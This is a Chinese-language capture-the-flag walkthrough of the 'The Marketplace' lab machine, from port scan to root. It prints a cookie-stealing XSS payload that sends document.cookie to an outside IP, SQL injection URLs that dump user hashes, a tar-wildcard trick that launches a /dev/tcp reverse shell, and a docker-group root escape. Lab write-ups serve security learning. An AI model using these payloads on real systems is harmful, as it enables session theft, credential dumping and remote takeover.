简介

你能接管 The Marketplace 的基础设施吗？

Task

首先还是先扫下端口

发现开启了三个端口
先访问80看看

这里有个robots.txt文件

但是无法访问该界面

有一个前台登录口

有一个注册点，注册了个账号进入用户后台
这里的文件上传被禁了

尝试XSS

<script>alert('XSS')</script>

成功弹窗，证明这里有XSS

突然想到主页上有一个给管理员发信息

点击试试

接着就收到了一条回复

也就说明被查看了
尝试构造XSS打cookie
在git找了个脚本
https://github.com/R0B1NL1N/WebHacking101
更改py中的IP，用python2启动

攻击代码

<script>var i=new Image;i.src="http://10.10.132.222:8888/?"+document.cookie;</script>

重新生成一个商品

生成后会得到一串cookie，这个是我的
接着把攻击代码发送给管理员

这时候收到一个不同于我的cookie

这时候使用cookie editor插件更改cookie
保存后刷新成功进入管理员后台

点击 Administration panel成功获取第一个flag
点击下面的用户，跳转到一个界面

在url后面加了个'，发现报错，存在注入

用sqlmap没法跑，所以最后还是开始手注

数据库

表名

http://10.10.19.59/admin?user=2%20and%201%20=2%20UNION%20SELECT%201,group_concat(table_name),3,4%20from%20%20information_schema.tables%20where%20table_schema=%20%27marketplace%27

获取字段
http://10.10.19.59/admin?user=2%20and%201%20=2%20UNION%20SELECT%201,group_concat(column_name),3,4%20%20from%20information_schema.columns%20where%20table_name=%27users%27

获取hash

http://10.10.19.59/admin?user=2%20and%201%20=2%20UNION%20SELECT%201,group_concat(username,0x3a,password),3,4%20%20from%20users

尝试解密，但是没成功
接着查看其他表

列出消息

获取SSH密码
尝试登录
这个信息是发给id为3的用户，所以是jake
成功登录

成功找到flag

接着尝试提权
首先sudo -l
这里发现有一个命令可以免密使用sudo

这里我们查看下文件

这里可以看到文件中调用了tar命令
之前曾经用过tar提权

$ printf '#!/bin/bash\nbash -i >& /dev/tcp/10.10.224.192/6666 0>&1' > /opt/backups/shell
$ chmod +x /opt/backups/shell
$ touch /opt/backups/--checkpoint=1
$ touch /opt/backups/--checkpoint-action=exec=bash\ shell

接着

sudo -u michael ./backup.sh

成功收到shell

首先还是更改下伪终端

python -c "import pty;pty.spawn('/bin/bash')"

因为我们不知道michael的密码，所以我们不能sudo -l
在查看网卡的时候发现了docker

尝试docker命令，发现在docker组里，可以使用docker的命令

查看了下提权

尝试

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

成功提权，获取flag